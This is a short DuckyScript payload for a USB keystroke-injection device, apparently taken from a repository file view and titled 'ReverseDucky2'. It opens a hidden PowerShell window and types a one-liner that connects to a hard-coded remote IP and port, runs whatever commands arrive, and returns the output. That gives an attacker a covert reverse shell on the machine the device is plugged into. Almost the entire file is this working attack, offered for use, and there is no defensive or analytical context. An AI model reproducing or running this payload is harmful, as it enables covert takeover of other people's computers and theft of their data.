26 lines
800 B
Plaintext
26 lines
800 B
Plaintext
REM ReverseDucky2
|
|
REM Version 1.1
|
|
REM OS: Windows / Linux(?) (Not tested with Powershell on Linux)
|
|
REM Author: 0iphor13
|
|
|
|
REM Reverse shell executed in the background
|
|
REM Fill in Attacker-IP and Port in Line 19
|
|
REM DON'T FORGET TO START LISTENER
|
|
|
|
|
|
DELAY 1500
|
|
GUI r
|
|
DELAY 500
|
|
STRING powershell -NoP -NonI -W hidden
|
|
DELAY 250
|
|
ENTER
|
|
|
|
DELAY 200
|
|
STRING $c=NewObject System.Net.Sockets.TCPClient("45.92.178.34", 31337);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$
|
|
DELAY 100
|
|
STRING s.Read($b,0,$b.Length))-ne 0){;$d=(NewObject -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$z=(ieX $d 2>&1|oU
|
|
DELAY 100
|
|
STRING t-String);$x=$z+"RD "+(pwd)+"#";$y=([text.encoding]::ASCII).GetBytes($x);$s.Write($y,0,$y.Length);$s.Flush()};$c.Close()
|
|
DELAY 100
|
|
ENTER
|